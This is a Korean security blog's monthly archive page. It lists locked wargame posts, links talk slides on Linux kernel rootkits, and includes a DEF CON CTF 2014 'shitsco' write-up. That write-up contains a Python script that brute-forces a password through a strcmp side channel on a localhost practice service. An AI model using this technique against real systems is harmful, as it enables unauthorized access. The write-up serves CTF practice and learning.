'2015/05'에 해당되는 글 5건

  1. 2015.05.29 vortex9
  2. 2015.05.29 vortex8
  3. 2015.05.29 vortex7
  4. 2015.05.08 Codegate Junior Seminar 2015 발표자료
  5. 2015.05.08 [defcon ctf 2014] shitsco

vortex9

2015. 5. 29. 15:35

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex8

2015. 5. 29. 15:35

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex7

2015. 5. 29. 15:34

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

코드게이트 측에서 발표자료를 올려주는줄 알았는데 안올려주시더라구요.

그래서 좀 늦은 감이 없지않아 있지만.. 발표자료 첨부합니다.


발표주제는 Hacking Linux Kernel with Rootkit 입니다.


Hacking Kernel with Rootkit.pdf

 

Posted by xer0s :

데프콘 준비겸 작년도꺼 문제들 풀어보는중..

취약점은 password를 입력받는과정에서 strcmp의 리턴값을 저장할 수 있는 변수를 릭함으로써 password를 알아낼수 있다는것!


#!/usr/bin/python


from pwn import *

from socket import *



string = ""


s = socket(AF_INET, SOCK_STREAM)

s.connect(("localhost", 31335))

print recvUntil(s, "$")


for i in range(32):

for j in range(0x80, 0x20, -1):

tmp = chr(j)


s.send("enable\n")

print s.recv(1024)

payload = ""

payload += string+tmp

payload += "\x20"*(26-(i+1))


s.send(payload+"\n")

if chr(0xff) not in s.recv(1024):

string += chr(j)

break


print "Key is : "+string


'General News > Write-Ups' 카테고리의 다른 글

[ConfidenceCTF-teaser]Power level  (0) 2015.04.28
[ConfidenceCTF-teaser]Apache Underwear  (0) 2015.04.28
[ConfidenceCTF-teaser]Pratical-Numerology  (0) 2015.04.28
HackIM nullcon exploitation400  (0) 2015.01.11
HackIM nullcon exploitation300  (0) 2015.01.11
Posted by xer0s :